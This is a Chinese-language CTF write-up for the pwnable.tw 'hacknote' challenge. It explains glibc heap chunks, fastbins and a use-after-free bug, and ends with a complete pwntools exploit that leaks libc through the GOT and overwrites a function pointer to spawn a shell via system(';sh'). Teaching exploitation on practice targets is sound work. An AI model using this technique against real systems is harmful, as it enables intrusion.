pwnable.tw新手向write up(四) hacknote-Use After Free

pwnable.tw新手向write up(四) hacknote-Use After Free
2020-05-08 22:53:27 Author: bbs.pediy.com(查看原文) 阅读量:279 收藏

[原创]pwnable.tw新手向write up(四) hacknote-Use After Free: 1天前 236

[原创]pwnable.tw新手向write up(四) hacknote-Use After Free

往期

pwnable.tw新手向write up(一)
pwnable.tw新手向write up(二) 3×17-x64静态编译程序的fini_array劫持
 pwnable.tw新手向write up(三) dubblesort-多重保护下的栈溢出

前置知识

如果你没做过堆类型的题目,或者对chunk,fast bin这些内容还不怎么清楚的话,可以先看看这个:《glibc内存管理ptmalloc源代码分析.pdf》,作者是华庭,具体文件我会上传到附件的.

chunk的实际大小与申请的内存大小并不相同

我们所有使用malloc或者其他方式申请的内存空间,ptmalloc都使用chunk来表示,释放掉的内存也不是直接归还给操作系统,而是依旧用chunk来管理.所以chunk在使用中和释放后是两种不同的结构.首先是使用中:

  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of previous chunk, if unallocated (P clear)  |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of chunk, in bytes                     |A|M|P|
    mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             User data starts here...                          .
          .                                                               .
          .             (malloc_usable_size() bytes)                      .
  next    .                                                               |
  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             (size of chunk, but used for application data)    |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of next chunk, in bytes                |A|0|1|
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

前两个字节为chunk header,第三个字节开始,也就是mem指针指向的地方开始,就是我们申请的内存(大小等于我们申请的大小),malloc函数返回值就是mem指针的值.接着看看被释放的chunk:

  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of previous chunk, if unallocated (P clear)  |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  `head:' |             Size of chunk, in bytes                     |A|0|P|
    mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Forward pointer to next chunk in list             |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Back pointer to previous chunk in list            |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Unused space (may be 0 bytes long)                .
          .                                                               .
   next   .                                                               |
  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  `foot:' |             Size of chunk, in bytes                           |
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
          |             Size of next chunk, in bytes                |A|0|0|
          +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

user data被替换为了两个指针,fd指向前一个空间的chunk,bk指向后一个,如果是large bin的话还会多两个指针,不过这里就不提了.

现在我们已经知道了chunk的构造,那么如何通过申请内存的大小来计算chunk的实际大小呢?以32位系统为例,一个free掉的chunk有四个字段,分别是prev_size,size,fd,bk,也就是16个字节,所以一个chunk的大小最小为16字节.再看看使用中的chunk,因为是使用状态,所以下一个chunk的prev_size就是无效的,所以这个地方也可以被当前chunk使用.

这样就可以得知,chunk的in_use_size=(用户请求大小+8-4) align 8B.稍微解释一下,从左到右,用户请求大小就是我们申请的大小,+8是因为需要两个字段来保存chunk header,-4就是因为当前chunk可以使用下一个chunk的prev_size,节省了4字节的大小,对齐8B则是ptmalloc的要求.

所以,最终的分配空间大小chunk_size = max(in_use_size,16).下文中及exp中用到的大小都是chunk的最终分配大小.

Fast Bins 简介

glibc采用单向链表对其中的每个 bin 进行组织,并且每个bin采取LIFO策略,也就是和栈一样,最近释放的chunk会被更早的分配.不同大小的chunk也不会被链接在一起,fastbin支持从16字节开始的10个相应大小的bin.
glibc中的首次适应(First Fit)算法:空间分区以地址递增的次序链接,分配内存时顺序查找,找到大小能满足要求的第一个空闲分区.

如果分配内存时存在一个大于或等于所需大小的空间chunk,glibc就会选择这个chunk.举个例子:
```
  a = malloc(512) = 0x2490010
  b = malloc(256) = 0x2490220
  free(a)
  c = malloc(500) = 0x2490010
```
Use After Free

当一个内存块在被释放之后,执行他的指针应该置0,不然就会变成危险的悬挂指针,使得这个内存块被再次申请出去之后(比如刚刚说的First Fit),我们还可以对内容进行操作,比如我们将数据进行构造之后,再次利用这个不合法的悬挂指针,就可能造成任意地址读写.

具体题目 hacknote

看一下防护,只开了NX和Canary

  [0] % checksec hacknote
  [*] '/home/dylan/ctfs/pwnable_tw/hacknote/hacknote'
      Arch:     i386-32-little
      RELRO:    Partial RELRO
      Stack:    Canary found
      NX:       NX enabled
      PIE:      No PIE

ida分析一下程序结构,比较短小.

  void __cdecl __noreturn main()
  {
    int choice_int; // eax
    char choice_char; // [esp+8h] [ebp-10h]
    unsigned int canary; // [esp+Ch] [ebp-Ch]

    canary = __readgsdword(0x14u);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
    while ( 1 )
    {
      while ( 1 )
      {
        ui_func();
        read(0, &choice_char, 4u);
        choice_int = atoi(&choice_char);
        if ( choice_int != 2 )
          break;
        delete_func();
      }
      if ( choice_int > 2 )
      {
        if ( choice_int == 3 )
        {
          show_func();
        }
        else
        {
          if ( choice_int == 4 )
            exit(0);
  LABEL_13:
          puts("Invalid choice");
        }
      }
      else
      {
        if ( choice_int != 1 )
          goto LABEL_13;
        add_func();
      }
    }
  }

main函数没什么好说的,常规的堆题目,打印一个菜单,分别提供创建,删除和打印笔记的功能,先进入add_func查看一下:

  unsigned int add_func()
  {
    manage_note *note; // ebx
    signed int i; // [esp+Ch] [ebp-1Ch]
    int size; // [esp+10h] [ebp-18h]
    char buf; // [esp+14h] [ebp-14h]
    unsigned int canary; // [esp+1Ch] [ebp-Ch]

    canary = __readgsdword(0x14u);
    if ( chunk_count <= 5 )
    {
      for ( i = 0; i <= 4; ++i )
      {
        if ( !chunk_ptr[i] )
        {
          chunk_ptr[i] = malloc(8u);
          if ( !chunk_ptr[i] )
          {
            puts("Alloca Error");
            exit(-1);
          }
          *(_DWORD *)chunk_ptr[i] = puts_func;
          printf("Note size :");
          read(0, &buf, 8u);
          size = atoi(&buf);
          note = (manage_note *)chunk_ptr[i];
          note->content_ptr = (int *)malloc(size);
          if ( !*((_DWORD *)chunk_ptr[i] + 1) )
          {
            puts("Alloca Error");
            exit(-1);
          }
          printf("Content :");
          read(0, *((void **)chunk_ptr[i] + 1), size);
          puts("Success !");
          ++chunk_count;
          return __readgsdword(0x14u) ^ canary;
        }
      }
    }
    else
    {
      puts("Full");
    }
    return __readgsdword(0x14u) ^ canary;
  }

chunk_count限制使用add函数的次数.申请note的时候,程序先申请8字节内存,并且把地址保存在chunk_ptr[]中.这8个字节用来保存note结构,前四个字节保存一个函数指针,姑且命名为puts_func,这个函数将传入指针的下一个偏移地址的内容打印出来

  int __cdecl puts_func(int *a1)
  {
    return puts((const char *)a1[1]);
  }

后四个字保存一个指针,指向大小为size的内存,用来保存note的content.这样可能不是很直观,我用c语言展示一下note的结构:

  struct manage_note
  {
    int *puts_func_ptr;
    int *content_ptr;
  };

puts_func_ptr指向puts_func这个函数,content_ptr则指向note的content,用来保存我们的输入.如果还是不直观的话,可以看看图:

              note
     +-----------------+                    +----------------+   
     |  *puts_func_ptr |------------------->|    puts_func   |         
     +-----------------+                    +----------------+   
     |  *content_ptr   |------------------->+----------------+
     +-----------------+                    |     real       |
                                            |    content     |
                                            +----------------+

这样应该很清晰了,假设我们创建一个大小为10字节的note,程序会先申请八个字节来保存note结构,接着再申请0x10字节作为real_content保存我们的输入.

  unsigned int delete_func()
  {
    int index; // [esp+4h] [ebp-14h]
    char buf; // [esp+8h] [ebp-10h]
    unsigned int canary; // [esp+Ch] [ebp-Ch]

    canary = __readgsdword(0x14u);
    printf("Index :");
    read(0, &buf, 4u);
    index = atoi(&buf);
    if ( index < 0 || index >= chunk_count )
    {
      puts("Out of bound!");
      _exit(0);
    }
    if ( chunk_ptr[index] )                       // UAF
    {
      free(*((void **)chunk_ptr[index] + 1));
      free(chunk_ptr[index]);
      puts("Success");
    }
    return __readgsdword(0x14u) ^ canary;
  }

delete_func函数先读取一个下标index,然后对相应的note进行free.这两个free比较晕,第一个free释放我们的rea_content,第二个free释放note结构,但是释放之后并没有对指针进行置0,造成了两个悬挂指针,我们可以对释放后的指针继续进行操作,所以这个地方造成了UAF.

  unsigned int show_func()
  {
    int index; // [esp+4h] [ebp-14h]
    char buf; // [esp+8h] [ebp-10h]
    unsigned int canary; // [esp+Ch] [ebp-Ch]

    canary = __readgsdword(0x14u);
    printf("Index :");
    read(0, &buf, 4u);
    index = atoi(&buf);
    if ( index < 0 || index >= chunk_count )
    {
      puts("Out of bound!");
      _exit(0);
    }
    if ( chunk_ptr[index] )
      (*(void (__cdecl **)(void *))chunk_ptr[index])(chunk_ptr[index]);
    return __readgsdword(0x14u) ^ canary;
  }

show_func函数先读取一个下标index,接着调用*chunk_ptr[index]处的函数,也就是我们刚刚说到的puts_func,参数则是chunk_ptr[index],又因为puts_func实际打印的是传入参数的下一个地址,也就是note->content的内容,那么就会打印出我们输入的content.

利用思路
- 唯一的漏洞是delete_func函数里面存在UAF,哪怕一个note已经被我们删除,我们依然可以调用show_func函数来调用puts_func_ptr指向的函数,如果我们可以修改puts_func_ptr的值,那么我们就可以劫持程序的控制流了.具体如何修改我写到exp里边了,这里你先假设你已经可以修改了.
- 但是这个程序并没有后门函数,并且还给了libc.so文件,所以我们需要先泄露libc加载的地址,然后计算得到system函数和'/bin/sh'的地址.因为我们现在已经可以修改note中的两个指针,所以只要将content_ptr修改为got['puts']的地址就可以泄露libc基地址了
- 通过libc基地址可以计算出system函数的地址,然后继续修改一个note的puts_func_ptr就可以调用system函数了.这里对于system函数的参数设置还有一个坑,回顾一下show_func函数的内容:
```
    if ( chunk_ptr[index] )
      (*chunk_ptr[index])(chunk_ptr[index]);
```
  此时chunk_ptr[index]保存的是note指针,chunk_ptr[index]也就是*note->puts_func_ptr,这会调用system函数,和我们预想的一样,但是参数同样是note指针,puts_func自身进行了四个字节的偏移,所以才能顺利打印出content的内容,system函数并不会进行偏移,自然也就无法执行system('/bin/sh').
  
  我们可以考虑构造note指针本身,它本身作为参数,前四个字节无法被系统识别,只要在后四个字节加入一个';',就可以自由执行命令了,举个例子:
```
  (ssh) dylan@eureka-pwn : ~/ctfs/pwnable_tw/hacknote
  [0] % fuck;ls
  zsh: command not found: fuck
  core  hacknote  hack.py  libc.so
```
  回到题目,我们的system函数地址无法被识别,但是分号后边如果加一个sh就可以顺利执行了

exp

  #!/usr/bin/env python2
  # -*- coding: utf-8 -*-
  from PwnContext.core import *
  local = False

  # Set up pwntools for the correct architecture
  exe = './' + 'hacknote'
  elf = context.binary = ELF(exe)
  ctx.custom_lib_dir = '/home/dylan/glibc-all-in-one/libs/2.23-0ubuntu10_i386'

  #don't forget to change it
  host = args.HOST or 'chall.pwnable.tw'
  port = int(args.PORT or 10102)

  #don't forget to change it
  #ctx.binary = './' + 'hacknote'
  ctx.binary = exe
  libc = args.LIBC or 'libc.so'
  elf_libc = ELF(libc)
  ctx.debug_remote_libc = True
  ctx.remote_libc = libc
  if local:
      context.log_level = 'debug'
      try:
          io = ctx.start()
      except Exception as e:
          print(e.args)
          print("It can't work,may be it can't load the remote libc!")
          print("It will load the local process")
          io = process(exe)
  else:
      io = remote(host,port)
  #===========================================================
  #                    EXPLOIT GOES HERE
  #===========================================================

  # Arch:     i386-32-little
  # RELRO:    Partial RELRO
  # Stack:    Canary found
  # NX:       NX enabled
  # PIE:      No PIE (0x8048000)
  def add(size,content):
      io.recvuntil('Your choice :')
      io.send(str(1))
      io.recvuntil(':')
      io.send(str(size))
      io.recvuntil('Content :')
      io.send(content)

  def delete(index):
      io.recvuntil('Your choice :')
      io.send(str(2))
      io.recvuntil('Index :')
      io.send(str(index))

  def show(index):
      io.recvuntil('Your choice :')
      io.send(str(3))
      io.recvuntil('Index :')
      io.send(str(index))

  def exp():
      puts_func_addr = 0x0804862B

      # 申请两块real_content size为16的note
      # 实际上申请了四块内存,分别是两块保存note的16字节chunk,两块保存real_content的24字节chunk
      # 如果你不明白为什么是16和24字节,请翻看前置知识的chunk大小计算
      add(16,'a'*16) # note 0
      add(16,'a'*16) # note 1

      # 分别把 note 0 和 note 1 释放
      # 和上面类似,实际上释放了四块内存,都被加入了Fast Bins中
      # 两块24字节的chunk链接在了一起,即real_content_1 -> real_content_0,用不到了,忘记它的存在吧
      # 关键在于两个16字节的chunk链接在了一起,即 note_1 -> note_0
      delete(0)
      delete(1)

      # 现在,我们重新申请size为8的note,我们将会malloc两块16字节大小的chunk
      # 首先程序malloc了一个16字节的chunk来保存note,根据前文说的First Fit以及Fast Bins的性质
      # 我们就可以推断出note_2对应的chunk其实就是note_1
      # 接着程序再malloc一个16字节的chunk来作为real_content存放我们的输入
      # 此时,real_content_2对应的chunk就是note_0,我们可以对real_content_2进行输入
      # 我们对real_content_2输入的时候,就会改写note_0保存的两个指针

      add(8,p32(puts_func_addr) + p32(elf.got['malloc']))

      # 如下,我们调用puts_func打印出elf.got['malloc']的值,从而泄露libc地址
      show(0)

      # 通过计算得到这些地址
      malloc_got = u32(io.recvn(4)[:4])
      log.success("malloc_got = " + hex(malloc_got))

      libc_base = malloc_got - elf_libc.symbols['malloc']
      log.success("libc_base = " + hex(libc_base))

      system_addr = libc_base + elf_libc.symbols['system']
      log.success("system_addr = " + hex(system_addr))

      bin_sh_addr = libc_base + elf_libc.search('/bin/sh\x00').next()
      log.success("bin_sh_addr = " + hex(bin_sh_addr))

      # 释放note_2,那么fastbin又会回到note_1 -> note_0这个状态
      delete(2)

      # note_2 -> puts_func_ptr == system_addr
      # 参数为p32(system_addr) + ';sh\x00'
      add(8,p32(system_addr) + ';sh\x00')

      # getshell
      show(0)

  if __name__ == '__main__':
      exp()
      io.interactive()

PS:如果你的IDA和我反汇编出来代码不一样,那是因为我进行了变量重命名和函数类型修改,还创建了一个note结构体,不过这个影响应该不大.
关于我

blog:https://0x2l.github.io/

[培训]科锐逆向工程师培训班38期--远程教学预课班将于 2020年5月28日正式开班！

文章来源: https://bbs.pediy.com/thread-259371.htm
如有侵权请联系:admin#unsafe.sh